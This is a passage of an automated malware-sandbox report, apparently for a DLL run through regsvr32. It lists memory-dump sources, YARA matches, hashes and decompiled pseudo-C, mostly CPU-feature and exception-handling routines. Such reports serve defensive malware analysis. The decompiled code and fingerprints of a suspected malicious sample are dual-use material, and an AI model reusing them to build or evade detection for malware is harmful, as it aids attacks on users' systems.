                                                                                                                                                                                                            				goto 0x800069af;
                                                                                                                                                                                                            				return 0xffffffff;
                                                                                                                                                                                                            			}
























                                                                                                                                                                                                            0x18000693d
                                                                                                                                                                                                            0x180006943
                                                                                                                                                                                                            0x180006946
                                                                                                                                                                                                            0x180006959
                                                                                                                                                                                                            0x180006962
                                                                                                                                                                                                            0x180006968
                                                                                                                                                                                                            0x180006979
                                                                                                                                                                                                            0x180006982
                                                                                                                                                                                                            0x180006986
                                                                                                                                                                                                            0x180006992
                                                                                                                                                                                                            0x18000699b
                                                                                                                                                                                                            0x1800069a6
                                                                                                                                                                                                            0x1800069aa
                                                                                                                                                                                                            0x1800069c7

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                            • Opcode ID: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
                                                                                                                                                                                                            • Instruction ID: cb99d1167c8630c4161f8148837d3d56db0acdce36f97f7f4c16ea76a7bcc33d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF41C272310A5886EF85CF6AD95479973A2B74CFD0F19D422EE4D97B68DE3CC2458300
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
                                                                                                                                                                                                            • Instruction ID: c836f3e58c16706dd3c80b20d06e017b6bbce156b8b04ce9cc750eb898ec9928
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE51B2B090474E8FDB48CF68D48A5DE7FB0FB68398F204619E81696250D7B4D6A5CFC0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
                                                                                                                                                                                                            • Instruction ID: e4eaa8bc43b45f4b5d8b63ef1d02a21468cbb00578103819409851d9b0bad903
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F45128719047498BDF48CF68C8895DEBBF1FB48318F11835CE88AA72A0D7B89A44CF45
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
                                                                                                                                                                                                            • Instruction ID: 062d643264739ab1e891a94cba31190f9edc2e5fafa36bbc930a99bd3432fa84
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D51A4B090438E8FDB88CF68D88A5CE7BF0FB58358F105619E865A6250D3B8D664CF95
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
                                                                                                                                                                                                            • Instruction ID: b92c993013505d333f54714688ca06d341c04675f8e13dc3dd7c5227dab0f639
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E51AEB490438E8FDB48CF68C88A5DF7BB1FB58348F004A19EC25A6250D3B8D665CF91
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
                                                                                                                                                                                                            • Instruction ID: d773df06b56020ae56cb85f4e5a2bd26087ae3abbd8f963620cd7788ad609e84
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC41C2B090074E8FDB48DF64C48A5DE7FB0FB68388F104619E81AA6250D378D6A4CFC5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
                                                                                                                                                                                                            • Instruction ID: ffc56fd7168c6e695a14d31422796184757635042a1164aedc04677320af0710
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B3175B052D781ABD38CDF28D59991ABBE1FB89304F806A2DF98687350D774D445CB07
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
                                                                                                                                                                                                            • Instruction ID: efbb35fdfc96545695bc25e3bd00db16034c98cb8ef7f57b9f660a286bfd5c46
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F315AB450C7848BD348DF28C54A51ABBE1BB8D309F404B5DF8CAAA360D778D615CB4B
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
                                                                                                                                                                                                            • Instruction ID: 623f27fec58fef4aaa379f7fbafc113b066f1698bb351901cc59bf5a19c6bb77
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B218E70629380AFD388DF28D48981ABBF0BB89344F806A2DF8C68B360D775D445CB03
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
                                                                                                                                                                                                            • Instruction ID: 199196ca8ace7e8d42d391659d5c3f2c80ec6c3440db0b61eb753a63f83db2a3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 622146B45187858BD349DF28D49941ABBE0FB8C31CF805B2DF4CAAA264D378D645CB0A
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                            			E000000011800070A0(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                            
                                                                                                                                                                                                            				_t25 = __r8;
                                                                                                                                                                                                            				r8d = 0;
                                                                                                                                                                                                            				 *0x800223a8 = r8d;
                                                                                                                                                                                                            				_t1 = _t25 + 1; // 0x1
                                                                                                                                                                                                            				r9d = _t1;
                                                                                                                                                                                                            				asm("cpuid");
                                                                                                                                                                                                            				_v16 = r9d;
                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                            				_v20 = __ebx;
                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                            				if (0 != 0x18001000) goto 0x80007101;
                                                                                                                                                                                                            				asm("xgetbv");
                                                                                                                                                                                                            				_a8 = __rdx << 0x00000020 | __rax;
                                                                                                                                                                                                            				r8d =  *0x800223a8; // 0x1
                                                                                                                                                                                                            				r8d =  ==  ? r9d : r8d;
                                                                                                                                                                                                            				 *0x800223a8 = r8d;
                                                                                                                                                                                                            				 *0x800223ac = r8d;
                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                            			}








                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
                                                                                                                                                                                                            • Instruction ID: 0b5ba2cec2f3816840067680c3456701fe7a71aa0eb5ae5909cae72e813b022f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B2F062717142989EDBEACF6CA84275A77D0E30C3C0F90C029E6D983B04D63C82A48F44
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: GestureInfo$CloseHandle
                                                                                                                                                                                                            • String ID: 8
                                                                                                                                                                                                            • API String ID: 372500805-4194326291
                                                                                                                                                                                                            • Opcode ID: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
                                                                                                                                                                                                            • Instruction ID: 9b1c06a3f3b833ac3e132f42adadd70dae9d03e82ad46587f4b990887cf4d8b3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8D1DD76608F888AD765CB29E45439EB7A0F7C9BD0F508116EACE83768DF78C545CB01
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: PaintProcWindow$BeginMessagePostQuit
                                                                                                                                                                                                            • String ID: i
                                                                                                                                                                                                            • API String ID: 3181456275-3865851505
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Object$LineMoveSelect$CreateDeletePolyline
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1917832262-0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            C-Code - Quality: 66%
                                                                                                                                                                                                            			E00000001180003328(intOrPtr __ecx, void* __edx, void* __esi, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9, void* __r10) {
                                                                                                                                                                                                            				void* __rbx;
                                                                                                                                                                                                            				void* __rdi;
                                                                                                                                                                                                            				void* __rsi;
                                                                                                                                                                                                            				void* __rbp;
                                                                                                                                                                                                            				signed int* _t128;
                                                                                                                                                                                                            				void* _t145;
                                                                                                                                                                                                            				intOrPtr _t146;
                                                                                                                                                                                                            				intOrPtr _t154;
                                                                                                                                                                                                            				void* _t173;
                                                                                                                                                                                                            				intOrPtr _t176;
                                                                                                                                                                                                            				signed int _t177;
                                                                                                                                                                                                            				signed int _t178;
                                                                                                                                                                                                            				void* _t209;
                                                                                                                                                                                                            				signed long long _t219;
                                                                                                                                                                                                            				signed long long _t220;
                                                                                                                                                                                                            				signed long long _t226;
                                                                                                                                                                                                            				long long _t228;
                                                                                                                                                                                                            				signed int _t235;
                                                                                                                                                                                                            				intOrPtr* _t236;
                                                                                                                                                                                                            				intOrPtr* _t237;
                                                                                                                                                                                                            				signed long long _t246;
                                                                                                                                                                                                            				long long _t267;
                                                                                                                                                                                                            				signed int* _t280;
                                                                                                                                                                                                            				long long _t281;
                                                                                                                                                                                                            				void* _t282;
                                                                                                                                                                                                            				void* _t283;
                                                                                                                                                                                                            				signed long long _t284;
                                                                                                                                                                                                            				long long _t296;
                                                                                                                                                                                                            				signed int _t307;
                                                                                                                                                                                                            				unsigned long long _t313;
                                                                                                                                                                                                            
                                                                                                                                                                                                            				_t180 = __esi;
                                                                                                                                                                                                            				_t282 = _t283 - 0x28;
                                                                                                                                                                                                            				_t284 = _t283 - 0x128;
                                                                                                                                                                                                            				_t219 =  *0x80021010; // 0xc23e8d4af72c
                                                                                                                                                                                                            				_t220 = _t219 ^ _t284;
                                                                                                                                                                                                            				 *(_t282 + 0x10) = _t220;
                                                                                                                                                                                                            				_t280 =  *((intOrPtr*)(_t282 + 0x90));
                                                                                                                                                                                                            				_t307 =  *((intOrPtr*)(_t282 + 0xa8));
                                                                                                                                                                                                            				 *((long long*)(_t284 + 0x68)) = __r8;
                                                                                                                                                                                                            				_t236 = __rcx;
                                                                                                                                                                                                            				 *((long long*)(_t284 + 0x78)) = __rdx;
                                                                                                                                                                                                            				 *(_t282 - 0x68) = _t307;
                                                                                                                                                                                                            				 *((char*)(_t284 + 0x60)) = 0;
                                                                                                                                                                                                            				_t281 = __r9;
                                                                                                                                                                                                            				_t128 = E0000000118000427C(__ecx, __esi, __rcx, __rdx, __r9, __r9, _t282, _t280, __r9);
                                                                                                                                                                                                            				r14d = _t128;
                                                                                                                                                                                                            				if (_t128 - 0xffffffff < 0) goto 0x800037f7;
                                                                                                                                                                                                            				if (_t128 - _t280[1] >= 0) goto 0x800037f7;
                                                                                                                                                                                                            				if ( *_t236 != 0xe06d7363) goto 0x80003474;
                                                                                                                                                                                                            				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0x80003474;
                                                                                                                                                                                                            				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003474;
                                                                                                                                                                                                            				if ( *((long long*)(_t236 + 0x30)) != 0) goto 0x80003474;
                                                                                                                                                                                                            				E00000001180002D40(_t220);
                                                                                                                                                                                                            				if ( *((long long*)(_t220 + 0x20)) == 0) goto 0x80003790;
                                                                                                                                                                                                            				E00000001180002D40(_t220);
                                                                                                                                                                                                            				_t237 =  *((intOrPtr*)(_t220 + 0x20));
                                                                                                                                                                                                            				E00000001180002D40(_t220);
                                                                                                                                                                                                            				 *((char*)(_t284 + 0x60)) = 1;
                                                                                                                                                                                                            				 *((long long*)(_t284 + 0x68)) =  *((intOrPtr*)(_t220 + 0x28));
                                                                                                                                                                                                            				E00000001180002448(_t220,  *((intOrPtr*)(_t237 + 0x38)));
                                                                                                                                                                                                            				if ( *_t237 != 0xe06d7363) goto 0x8000342c;
                                                                                                                                                                                                            				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x8000342c;
                                                                                                                                                                                                            				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x8000342c;
                                                                                                                                                                                                            				if ( *((long long*)(_t237 + 0x30)) == 0) goto 0x800037f7;
                                                                                                                                                                                                            				E00000001180002D40(_t220);
                                                                                                                                                                                                            				if ( *(_t220 + 0x38) == 0) goto 0x80003474;
                                                                                                                                                                                                            				E00000001180002D40(_t220);
                                                                                                                                                                                                            				E00000001180002D40(_t220);
                                                                                                                                                                                                            				 *(_t220 + 0x38) =  *(_t220 + 0x38) & 0x00000000;
                                                                                                                                                                                                            				if (E00000001180004314(_t220, _t237, _t237,  *(_t220 + 0x38), __r9) != 0) goto 0x8000346f;
                                                                                                                                                                                                            				if (E00000001180004404(_t220, _t237,  *(_t220 + 0x38), __r9, _t282) == 0) goto 0x800037d4;
                                                                                                                                                                                                            				goto 0x800037b0;
                                                                                                                                                                                                            				 *((long long*)(_t282 - 0x40)) =  *((intOrPtr*)(__r9 + 8));
                                                                                                                                                                                                            				 *(_t282 - 0x48) = _t280;
                                                                                                                                                                                                            				if ( *_t237 != 0xe06d7363) goto 0x80003747;
                                                                                                                                                                                                            				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x80003747;
                                                                                                                                                                                                            				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003747;
                                                                                                                                                                                                            				r15d = 0;
                                                                                                                                                                                                            				if (_t280[3] - r15d <= 0) goto 0x80003678;
                                                                                                                                                                                                            				 *(_t284 + 0x28) =  *(_t282 + 0xa0);
                                                                                                                                                                                                            				 *(_t284 + 0x20) = _t280;
                                                                                                                                                                                                            				r8d = r14d;
                                                                                                                                                                                                            				_t145 = E00000001180002134(_t237, _t282 - 0x28, _t282 - 0x48, __r9, _t282, _t280, __r9, __r10);
                                                                                                                                                                                                            				asm("movups xmm0, [ebp-0x28]");
                                                                                                                                                                                                            				asm("movdqu [ebp-0x38], xmm0");
                                                                                                                                                                                                            				asm("psrldq xmm0, 0x8");
                                                                                                                                                                                                            				asm("movd eax, xmm0");
                                                                                                                                                                                                            				if (_t145 -  *((intOrPtr*)(_t282 - 0x10)) >= 0) goto 0x80003678;
                                                                                                                                                                                                            				_t296 =  *((intOrPtr*)(_t282 - 0x28));
                                                                                                                                                                                                            				r13d =  *((intOrPtr*)(_t282 - 0x30));
                                                                                                                                                                                                            				 *((long long*)(_t282 - 0x80)) = _t296;
                                                                                                                                                                                                            				_t146 = r13d;
                                                                                                                                                                                                            				asm("inc ecx");
                                                                                                                                                                                                            				 *((intOrPtr*)(_t282 - 0x50)) = __ecx;
                                                                                                                                                                                                            				asm("movd eax, xmm0");
                                                                                                                                                                                                            				asm("movups [ebp-0x60], xmm0");
                                                                                                                                                                                                            				if (_t146 - r14d > 0) goto 0x8000366b;
                                                                                                                                                                                                            				_t226 =  *(_t282 - 0x60) >> 0x20;
                                                                                                                                                                                                            				if (r14d - _t146 > 0) goto 0x8000366b;
                                                                                                                                                                                                            				r12d = r15d;
                                                                                                                                                                                                            				_t267 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t282 - 0x38)) + 0x10)) + ( *( *(_t282 - 0x38)) +  *( *(_t282 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t296 + 8)) + 0x10)) +  *((intOrPtr*)(__r9 + 8));
                                                                                                                                                                                                            				_t313 =  *(_t282 - 0x58) >> 0x20;
                                                                                                                                                                                                            				 *((long long*)(_t282 - 0x70)) = _t267;
                                                                                                                                                                                                            				if (r15d == 0) goto 0x80003658;
                                                                                                                                                                                                            				_t246 = _t226 + _t226 * 4;
                                                                                                                                                                                                            				asm("movups xmm0, [edx+ecx*4]");
                                                                                                                                                                                                            				asm("movups [ebp-0x8], xmm0");
                                                                                                                                                                                                            				_t59 = _t246 * 4; // 0x48ccccc35f40c483
                                                                                                                                                                                                            				 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t267 + _t59 + 0x10));
                                                                                                                                                                                                            				E0000000118000241C(_t226);
                                                                                                                                                                                                            				_t228 = _t226 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc));
                                                                                                                                                                                                            				 *((long long*)(_t284 + 0x70)) = _t228;
                                                                                                                                                                                                            				E0000000118000241C(_t228);
                                                                                                                                                                                                            				_t176 =  *((intOrPtr*)(_t228 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc))));
                                                                                                                                                                                                            				 *((intOrPtr*)(_t284 + 0x64)) = _t176;
                                                                                                                                                                                                            				if (_t176 <= 0) goto 0x800035e8;
                                                                                                                                                                                                            				E0000000118000241C(_t228);
                                                                                                                                                                                                            				 *((long long*)(_t282 - 0x78)) = _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70))));
                                                                                                                                                                                                            				if (E00000001180003A1C(_t180, _t237, _t282 - 8, _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70)))), _t280, __r9,  *((intOrPtr*)(_t237 + 0x30))) != 0) goto 0x800035f9;
                                                                                                                                                                                                            				 *((long long*)(_t284 + 0x70)) =  *((long long*)(_t284 + 0x70)) + 4;
                                                                                                                                                                                                            				_t154 =  *((intOrPtr*)(_t284 + 0x64)) - 1;
                                                                                                                                                                                                            				 *((intOrPtr*)(_t284 + 0x64)) = _t154;
                                                                                                                                                                                                            				if (_t154 > 0) goto 0x800035ac;
                                                                                                                                                                                                            				r12d = r12d + 1;
                                                                                                                                                                                                            				if (r12d == r15d) goto 0x8000365f;
